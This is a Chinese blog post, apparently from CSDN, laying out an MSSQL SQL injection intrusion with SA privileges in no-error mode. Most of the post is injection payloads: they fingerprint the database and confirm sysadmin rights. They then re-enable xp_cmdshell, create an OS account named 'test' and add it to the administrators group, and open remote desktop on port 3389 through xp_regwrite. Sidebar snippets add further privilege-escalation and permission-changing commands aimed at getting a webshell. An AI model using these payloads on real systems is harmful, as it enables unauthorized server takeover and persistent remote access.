MSSQL注入SA权限不显错模式下的入侵

最新推荐文章于 2023-07-20 14:57:27 发布
最新推荐文章于 2023-07-20 14:57:27 发布
阅读量142 收藏
点赞数
分类专栏: 网安工程师面试篇 sql注入 网络安全工程师面试篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56378124/article/details/118281076
版权

第一步判断是不是微软的sqlserver 数据库
and exists (select * from %20 sysobjects )
第二步查询当前数据库系统用户
and system_user=0
第三步检查权限是否为SA
and 1 =(slect IS_SRVROLEMEMBER(‘sysadmin’))
第四步判断一下xp_cmdshell 存储过程是否存在
and 1=(select count (*) from master.dbo.sysobjects where name = ‘xp_cmdshell’)
xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。
默认不存在恢复xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;–
第五步执行xp_cmdshell 扩展存储添加账号
;exec master…xp_cmdshell ‘net user test test /add’
把添加的账号添加到管理员组
;exec master…xp_cmdshell ‘net localgroup administrator test /add’
开启远程3389
;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,‘SYSTEM\CurrentControlSet\Control\Terminal Server’,‘fDenyTSConnections’,‘REG_DWORD’,0;–

安全界 的彭于晏
关注
专栏目录
mysql索引详解
学Java,找哪吒
07-07 10万+
MySQL的存储引擎架构将查询处理与数据的存储/提取相分离
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
mssql数据库注入-sa权限
最新发布
arissa666的博客
07-20 358
xp_regwrite是另一个远程拓展程序,上面是用注册表远程桌面控制,开启3389,REG_DWORD如果是0就是开启,是1就是关闭。准备一个网站,mssql是微软数据库,网站后缀是asp或者aspx,权限涉及sa,dbowner,public。没报错,说明是sa权限,可以利用拓展,将权限可以换成db_owner或者public就是判断权限归属。information_schema性质类同,如果数据库的名字错误,界面会报错。master库里面执行拓展程序,创建一个test账户密码test。
大型网站攻防
mengzaifei6的专栏
04-24 856
判断数据库类型 1.网站注入点后面加上 and user>0           如果返回Microsoft OLE DB Provider for SQL Server 错误 '80040e07'   为MS SQL 数据库           如果返回Microsoft OLE DB pROVIDER FOR  ODBC Driver 错误 '80040e10'  为Access数据库
常用SQL注入语句
chengjingdeni的专栏
08-07 559
<br />     在对web应用进行渗透测试时,SQL注入无疑是最重要的检测项之一,下面就对常用的SQL注入语句进行一个归纳总结,便于在进行渗透<br />测试时使用。<br />1.判断有无注入点<br />; and 1=1 and 1=2<br /><br />2.猜表一般的表的名称无非是admin adminuser user pass password 等..<br />and 0<>(select count(*) from *)<br />and 0<>(select count(*) f
数据库表的设计注意事项有哪些?三大范式是哪些?
最帅程序猿的博客
01-11 1104
数据库设计的注意事项: **字段的原子性:**保证每列的原子性,不可分解,能用一个字段表达清楚的绝不使 用第二个字段。 **主键设计:**主键不要与业务逻辑有所关联,最好是毫无意义的一串独立不重复的 数字。 **字段使用次数:**对于频繁修改的字段(一般是指状态类字段)最好用独立的数字 或者单个字母去表示,不用使用汉字或长字符的英文。 字段长度:建表的时候,字段长度尽量要比实际业务的字段大 3-5 个字段左右, 最好是 2 的 n 次方幂值。 关于外键:尽量不要建立外键,保证每个表的独立性。 动静分离:最好
sa权限(MSSQL注入SA权限不显错模式下的入侵
Coisini的博客
05-27 2181
内容:MSSQL注入SA权限不显错模式下的入侵 一般新手扫到不显错的SAsystemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。 我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。 这里的主机环境:MSSQL+JSP 权限不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和...
PHP+Mysql 带SQL注入源码 下载
01-01
3. **最小权限原则**:为应用数据库连接分配最小必要的权限,避免攻击者通过注入获取额外权限。 4. **日志监控**:定期检查数据库日志,发现异常行为及时响应。 **下载与部署** 下载这个源码后,你需要在本地或...
〖Python 数据库开发实战 - MySQL篇③〗- MacOS 环境下 MySQL数据库的安装与初始化
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
07-12 4万+
今天的章节我们来学习一下 MySQL 数据库的安装和初始化,挑选 MySQL 数据库进行学习是有原因的,因为这款数据库是应用最广泛普及度最高的关系型数据库产品;更重要的是开源免费的,可以说 MySQL 是各大互联网公司首选的数据库产品。......
mysql注入获取数据表_SQL注入之获取指定数据库数据Mysql(基础篇)
weixin_39750190的博客
01-25 3025
前言> 我们知道,在我们进行某网站sql注入的时候,我们有时候只可以进行简单的 union select user(),version(),@@basedir() #> 这类简单的查询,想要获得管理员用户密码或者敏感信息的时候就很难搞,因为我们不知道他的数据库表的名字以及字段名字,这篇文章就是介绍一下如果利用Mysql数据库自带的information_schema数据库获取其他数据库...
[提权禁区] SQL语句利用xp_cmdshell获取权限
weixin_34023982的博客
03-27 433
判断权限是不是sa select is_srvrolemember('sysadmin') 返回是1说明是sa 判断xp_cmdshell扩展存储是否存在 select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell' 返回为l则证明存在 ...
SQL注入不能多句执行时的一种突破方法(SA权限
weixin_34405557的博客
01-29 146
有时候会遇到SA权限不能多句执行的情况,让人很蛋疼。 前几天在搞一个SQL SERVER 7.0的PUBLIC权限时。 某牛给我以下语句提权 select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdsh...
SQL注入之Mssql注入
qq_57307348的博客
02-16 5501
sql注入之mssql注入基础
mssql注入sa权限被降为network service 得到webshell方法
Civil_War的专栏
07-19 2189
如果sa只有network service 权限,网上能搜索到的那些提权方法都是不能用的,这个内置账户的权限相当于USER.如果你无法通过数据库备份或通过SP_makewebtask得到webshell,可以这么做:xp_cmdshell可以cacls d: /e /t /g n
当注入拥有sa权限,提升webshell权限
大海的专栏
03-29 2476
 当注入拥有sa权限,提升webshell权限!修改权限为完全控制  程序代码eg: cacls d:/test /t /e /G everyone:f修改权限为只read 程序代码cacls d:/web/index.asp /e /t /P everyone:rCacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileNam
利用 SQL 注入修改目录权限
Kane 's Blog [A.D.K]
01-04 1908
当注入拥有sa权限,提升webshell权限! Cacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileName [/t] [/e [/r User [...]]] [/c] [/g User:Permission] [/p User:Permission [...]] [/d User [...]]参数FileName 必需
MySQL注入攻击防范与应对策略
"这篇资源主要讨论了MySQL注入攻击与防御的相关知识,包括注入攻击常用的函数和字符、测试注入的方法、注释符的使用、数据库的版本、主机名、用户、库名信息的获取,以及如何确定表和字段、字符串连接、条件语句和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值